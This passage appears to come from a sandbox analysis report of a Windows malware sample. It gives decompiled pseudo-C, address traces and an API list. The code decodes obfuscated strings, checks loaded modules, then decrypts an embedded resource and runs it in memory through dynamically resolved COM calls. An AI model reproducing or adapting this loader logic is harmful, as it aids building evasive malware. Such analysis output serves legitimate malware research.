					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x742dcf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
